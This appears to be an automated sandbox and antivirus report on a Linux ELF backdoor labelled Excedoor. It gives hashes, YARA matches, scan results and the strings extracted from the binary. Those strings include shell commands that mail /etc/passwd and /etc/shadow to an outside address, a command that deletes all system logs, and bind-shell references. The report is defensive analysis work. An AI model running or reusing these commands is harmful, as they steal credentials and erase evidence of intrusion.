Report #9847 check_circle

Binary
ABI
ELFOSABI_SYSV
Size
7.96KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
3d06f85ac19dc1a6f678aa4e28ce5c42
sha1
53133505622a36855141f2e9ec230f00e4e7107c
crc32
0xc960caa0
sha224
894da72ab14230a184530d4a4ce212615d4937cc0336816712dcd752
sha256
6138054a7de11c23b5c26755d7548c4096fa547cbb964ac78ef0fbe59d16c2da
sha384
bc4f3745a14c595440d4a72f98844e3e3cf5c423c7c91ffad5dac9b1021f17a26f4bdf5b8acced384f0637bbefacc828
sha512
605c8397f4a1897bc3a93c27ade14423d82a4bbb452bfd40023aa036788791ad0ccdbd8e969ef179f3dc6435f3ce13d6116c1c7b60d8491ca2519f17409b9f31
ssdeep
192:ffg/T/mqZlmfdswJLE11111JDxcumBWHicdw:ffa/mqZlVd11111hxABPf
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, contentis_base64, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc

Password
mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd, mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow
Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs

URLs
/lib/ld-linux.so.2, mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd, mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow
Mails
mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd, mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow
Suspicious
True check_circle
Strings
List
mail -s passwdforyababe gayz0r@boi.org.ie < /etc/passwd
mail -s shadowforyababe gayz0r@boi.org.ie < /etc/shadow
libc.so.6
.rel.plt
.rel.dyn
/lib/ld-linux.so.2
When you 'exit' this shell the UDP bd seems to exit. But it doesn't...
Brand new TCP root shell!
[crond]
__deregister_frame_info
__register_frame_info
server.c
mailpasswd
bindshell
socket@@GLIBC_2.0
execl@@GLIBC_2.0
Listen error
listen@@GLIBC_2.0
__deregister_frame_info@@GLIBC_2.0
Socket error
__register_frame_info@@GLIBC_2.0
socket
socket
accept
system
bind
bind
send
.hash
Please enter each command followed by ';'
GLIBC_2.0
object.11
dup2@@GLIBC_2.0
completed.4
.comment
gcc2_compiled.
__DTOR_END__
__CTOR_END__
__FRAME_END__
__EH_FRAME_BEGIN__
__DTOR_LIST__
__CTOR_LIST__
_GLOBAL_OFFSET_TABLE_
_DYNAMIC
call_gmon_start
init_dummy
fini_dummy
frame_dummy
data_start
.dynamic
__gmon_start__
__gmon_start__
force_to_data
.note.ABI-tag
.gnu.version
.shstrtab
.eh_frame
_IO_stdin_used
_IO_stdin_used
crtstuff.c
__libc_start_main
__do_global_ctors_aux
__do_global_dtors_aux
.gnu.version_r
__dso_handle
__data_start
.rodata
.interp
__bss_start
mailshadow
/bin/sh
removealllogs
mailstuff
01.01
01.01
01.01
01.01
01.01
01.01
.strtab
.symtab
rm -rf /var/log/*
_edata
_fini
.init
.fini
_init
Accept error
Bind error
.dynsym
.dynstr
.dtors
.ctors
_start
Letext
close
PTRh`
.got
_end
main

Symbols
List
Letext, gcc2_compiled., call_gmon_start, crtstuff.c, gcc2_compiled., p.3, __DTOR_LIST__, completed.4, __do_global_dtors_aux, __EH_FRAME_BEGIN__, fini_dummy, object.11, frame_dummy, init_dummy, force_to_data, __CTOR_LIST__, crtstuff.c, gcc2_compiled., __do_global_ctors_aux, __CTOR_END__, init_dummy, force_to_data, __DTOR_END__, __FRAME_END__, gcc2_compiled., server.c, gcc2_compiled., __dso_handle, execl@@GLIBC_2.0, mailshadow, _DYNAMIC, quit, __register_frame_info@@GLIBC_2.0, recvfrom@@GLIBC_2.0, close@@GLIBC_2.0, _fp_hw, perror@@GLIBC_2.0, fork@@GLIBC_2.0, signal@@GLIBC_2.0, mailstuff, accept@@GLIBC_2.0, system@@GLIBC_2.0, _init, listen@@GLIBC_2.0, __deregister_frame_info@@GLIBC_2.0, removealllogs, _start, strlen@@GLIBC_2.0, mailpasswd, __bss_start, main, __libc_start_main@@GLIBC_2.0, bindshell, dup2@@GLIBC_2.0, data_start, printf@@GLIBC_2.0, bind@@GLIBC_2.0, _fini, bzero@@GLIBC_2.0, exit@@GLIBC_2.0, _edata, _GLOBAL_OFFSET_TABLE_, _end, send@@GLIBC_2.0, htons@@GLIBC_2.0, _IO_stdin_used, __data_start, socket@@GLIBC_2.0, __gmon_start__, strcpy@@GLIBC_2.0
Number
97
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .interp, .note.ABI-tag, .hash, .dynsym, .dynstr, .gnu.version, .gnu.version_r, .rel.dyn, .rel.plt, .init, .plt, .text, .fini, .rodata, .data, .eh_frame, .dynamic, .ctors, .dtors, .got, .bss, .comment, .note, .shstrtab, .symtab, .strtab
Number
27
Suspicious
False cancel
Segments
Number
6
Suspicious
False cancel
Compilers
List
GCC: (GNU) 2.95.4 20011002 (Debian prerelease), GCC: (GNU) 2.95.4 20011002 (Debian prerelease), GCC: (GNU) 2.95.4 20011002 (Debian prerelease), GCC: (GNU) 2.95.4 20011002 (Debian prerelease), GCC: (GNU) 2.95.4 20011002 (Debian prerelease), GCC: (GNU) 2.95.4 20011002 (Debian prerelease), gcc2_compiled.
Identified
7
Suspicious
True check_circle
Functions
List
, , execl, @GLIBC_2.0 (2), __register_frame_info, @GLIBC_2.0 (2), recvfrom, @GLIBC_2.0 (2), close, @GLIBC_2.0 (2), perror, @GLIBC_2.0 (2), fork, @GLIBC_2.0 (2), signal, @GLIBC_2.0 (2), accept, @GLIBC_2.0 (2), system, @GLIBC_2.0 (2), listen, @GLIBC_2.0 (2), __deregister_frame_info, @GLIBC_2.0 (2), strlen, @GLIBC_2.0 (2), __libc_start_main, @GLIBC_2.0 (2), dup2, @GLIBC_2.0 (2), printf, @GLIBC_2.0 (2), bind, @GLIBC_2.0 (2), bzero, @GLIBC_2.0 (2), exit, @GLIBC_2.0 (2), send, @GLIBC_2.0 (2), htons, @GLIBC_2.0 (2), _IO_stdin_used, , socket, @GLIBC_2.0 (2), __gmon_start__, , strcpy, @GLIBC_2.0 (2), , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , Letext, , gcc2_compiled., , call_gmon_start, , crtstuff.c, , gcc2_compiled., , p.3, , __DTOR_LIST__, , completed.4, , __do_global_dtors_aux, , __EH_FRAME_BEGIN__, , fini_dummy, , object.11, , frame_dummy, , init_dummy, , force_to_data, , __CTOR_LIST__, , crtstuff.c, , gcc2_compiled., , __do_global_ctors_aux, , __CTOR_END__, , init_dummy, , force_to_data, , __DTOR_END__, , __FRAME_END__, , gcc2_compiled., , server.c, , gcc2_compiled., , __dso_handle, , execl@@GLIBC_2.0, , mailshadow, , _DYNAMIC, , quit, , __register_frame_info@@GLIBC_2.0, , recvfrom@@GLIBC_2.0, , close@@GLIBC_2.0, , _fp_hw, , perror@@GLIBC_2.0, , fork@@GLIBC_2.0, , signal@@GLIBC_2.0, , mailstuff, , accept@@GLIBC_2.0, , system@@GLIBC_2.0, , _init, , listen@@GLIBC_2.0, , __deregister_frame_info@@GLIBC_2.0, , removealllogs, , _start, , strlen@@GLIBC_2.0, , mailpasswd, , __bss_start, , main, , __libc_start_main@@GLIBC_2.0, , bindshell, , dup2@@GLIBC_2.0, , data_start, , printf@@GLIBC_2.0, , bind@@GLIBC_2.0, , _fini, , bzero@@GLIBC_2.0, , exit@@GLIBC_2.0, , _edata, , _GLOBAL_OFFSET_TABLE_, , _end, , send@@GLIBC_2.0, , htons@@GLIBC_2.0, , _IO_stdin_used, , __data_start, , socket@@GLIBC_2.0, , __gmon_start__, , strcpy@@GLIBC_2.0,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048700
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
6
Offset
52
Section Header
Size
40
Number
27
Offset
4612
AVclass
excedoor
1
VirusTotal
md5
3d06f85ac19dc1a6f678aa4e28ce5c42
sha1
53133505622a36855141f2e9ec230f00e4e7107c
SCANS (DETECTION RATE = 72.13%)
AVG
result: ELF:Malware-gen
update: 20191208
version: 18.4.3895.0
detected: True check_circle

CMC
result: Generic.Win32.3d06f85ac1!MD
update: 20190321
version: 1.1.0.977
detected: True check_circle

MAX
result: malware (ai score=100)
update: 20191208
version: 2019.9.16.1
detected: True check_circle

Bkav
update: 20191207
version: 1.3.0.9899
detected: False cancel

K7GW
update: 20191208
version: 11.81.32764
detected: False cancel

ALYac
result: Backdoor.Linux.Excedoor.A
update: 20191208
version: 1.1.1.5
detected: True check_circle

Avast
result: ELF:Malware-gen
update: 20191208
version: 18.4.3895.0
detected: True check_circle

Avira
result: BDS/Excedoor.A
update: 20191208
version: 8.3.3.8
detected: True check_circle

Baidu
update: 20190318
version: 1.0.0.2
detected: False cancel

Cyren
result: Unix/Excedoor
update: 20191208
version: 6.2.2.2
detected: True check_circle

DrWeb
result: Linux.BackDoor.Exced
update: 20191208
version: 7.0.42.9300
detected: True check_circle

GData
result: Backdoor.Linux.Excedoor.A
update: 20191208
version: A:25.24206B:26.16924
detected: True check_circle

Panda
result: Bck/Linux.Excedoor
update: 20191208
version: 4.6.4.2
detected: True check_circle

VBA32
update: 20191206
version: 4.2.0
detected: False cancel

VIPRE
update: 20191208
version: 79884
detected: False cancel

Zoner
update: 20191207
version: 1.0.0.1
detected: False cancel

ClamAV
update: 20191208
version: 0.102.1.0
detected: False cancel

Comodo
result: Backdoor@#iviv2mc7z3wn
update: 20191208
version: 31817
detected: True check_circle

F-Prot
result: Unix/Excedoor
update: 20191208
version: 4.7.1.166
detected: True check_circle

Ikarus
result: Trojan.Linux.Excedoor
update: 20191208
version: 0.1.5.2
detected: True check_circle

McAfee
result: Linux/BackDoor.c-Excedoor
update: 20191208
version: 6.0.6.653
detected: True check_circle

Rising
result: Backdoor.Linux.udt (CLASSIC)
update: 20191208
version: 25.0.0.24
detected: True check_circle

Sophos
result: Troj/Gazor-A
update: 20191208
version: 4.98.0
detected: True check_circle

Yandex
result: Backdoor.Linux.Excedoor.B
update: 20191205
version: 5.5.2.24
detected: True check_circle

Zillya
result: Backdoor.Excedoor.Linux.1
update: 20191207
version: 2.0.0.3969
detected: True check_circle

Arcabit
result: Backdoor.Linux.Excedoor.A
update: 20191208
version: 1.0.0.865
detected: True check_circle

FireEye
result: Backdoor.Linux.Excedoor.A
update: 20191208
version: 29.7.0.0
detected: True check_circle

Sangfor
result: Malware
update: 20191031
version: 1.0
detected: True check_circle

TACHYON
update: 20191208
version: 2019-12-08.02
detected: False cancel

Tencent
update: 20191208
version: 1.0.0.1
detected: False cancel

ViRobot
result: Linux.S.Excedoor.8149
update: 20191208
version: 2014.3.20.0
detected: True check_circle

Ad-Aware
result: Backdoor.Linux.Excedoor.A
update: 20191208
version: 3.0.5.370
detected: True check_circle

AegisLab
result: Trojan.Linux.Excedoor.m!c
update: 20191208
version: 4.2
detected: True check_circle

Emsisoft
result: Backdoor.Linux.Excedoor.A (B)
update: 20191208
version: 2018.12.0.1641
detected: True check_circle

F-Secure
result: Backdoor.BDS/Excedoor.A
update: 20191208
version: 12.0.86.52
detected: True check_circle

Fortinet
result: Linux/Gazor.A!tr
update: 20191208
version: 6.2.137.0
detected: True check_circle

Jiangmin
result: Backdoor/Linux.c
update: 20191208
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20191208
version: 2013.8.14.323
detected: False cancel

Symantec
result: Backdoor.Trojan
update: 20191207
version: 1.11.0.0
detected: True check_circle

AhnLab-V3
result: Linux/Excedoor.8149
update: 20191208
version: 3.16.5.25880
detected: True check_circle

Antiy-AVL
result: Trojan[Backdoor]/Linux.Excedoor
update: 20191208
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: Backdoor.Linux.Excedoor
update: 20191208
version: 15.0.1.13
detected: True check_circle

MaxSecure
update: 20191207
version: 1.0.0.1
detected: False cancel

Microsoft
result: Backdoor:Linux/Excedoor
update: 20191208
version: 1.1.16600.7
detected: True check_circle

Qihoo-360
result: Malware.Radar01.Gen
update: 20191208
version: 1.0.0.1120
detected: True check_circle

ZoneAlarm
result: Backdoor.Linux.Excedoor
update: 20191208
version: 1.0
detected: True check_circle

ESET-NOD32
result: Linux/Excedoor.10
update: 20191208
version: 20476
detected: True check_circle

TrendMicro
result: ELF_EXEDOOR.A
update: 20191208
version: 11.0.0.1006
detected: True check_circle

BitDefender
result: Backdoor.Linux.Excedoor.A
update: 20191208
version: 7.2
detected: True check_circle

K7AntiVirus
update: 20191208
version: 11.81.32765
detected: False cancel

SentinelOne
result: DFI - Malicious ELF
update: 20191203
version: 1.9.0.2431
detected: True check_circle

Avast-Mobile
update: 20191205
version: 191205-00
detected: False cancel

Malwarebytes
update: 20191208
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20191208
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
result: Linux.Backdoor.Excedoor
update: 20191208
version: 14.00
detected: True check_circle

NANO-Antivirus
result: Trojan.Elf32.Excedoor.htzb
update: 20191208
version: 1.0.134.24859
detected: True check_circle

BitDefenderTheta
update: 20191204
version: 7.2.37796.0
detected: False cancel

MicroWorld-eScan
result: Backdoor.Linux.Excedoor.A
update: 20191208
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
update: 20191203
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: Linux/BackDoor.c-Excedoor
update: 20191208
version: v2017.3010
detected: True check_circle

TrendMicro-HouseCall
result: ELF_EXEDOOR.A
update: 20191208
version: 10.0.0.1040
detected: True check_circle

total
61
sha256
6138054a7de11c23b5c26755d7548c4096fa547cbb964ac78ef0fbe59d16c2da
scan_id
6138054a7de11c23b5c26755d7548c4096fa547cbb964ac78ef0fbe59d16c2da-1575818844
resource
3d06f85ac19dc1a6f678aa4e28ce5c42
positives
44
scan_date
2019-12-08 15:27:24
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291execve"./malware"["./malware"] -1 ENOENT (No such file or directory)
4291write2"strace: exec: No such file or di"...40 40
4291exit_group1 ?

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True check_circle

DNS
Query

Response

TCP
Info

UDP
Info

HTTP
Info

Summary
DNS
False cancel

TCP
False cancel

UDP
False cancel

HTTP
False cancel

Binary
RF
confidence: 64.65%
suspicious: False cancel
MLP
confidence: 80.32%
suspicious: False cancel
SVM
confidence: 77.31%
suspicious: False cancel
Add to Collection
Download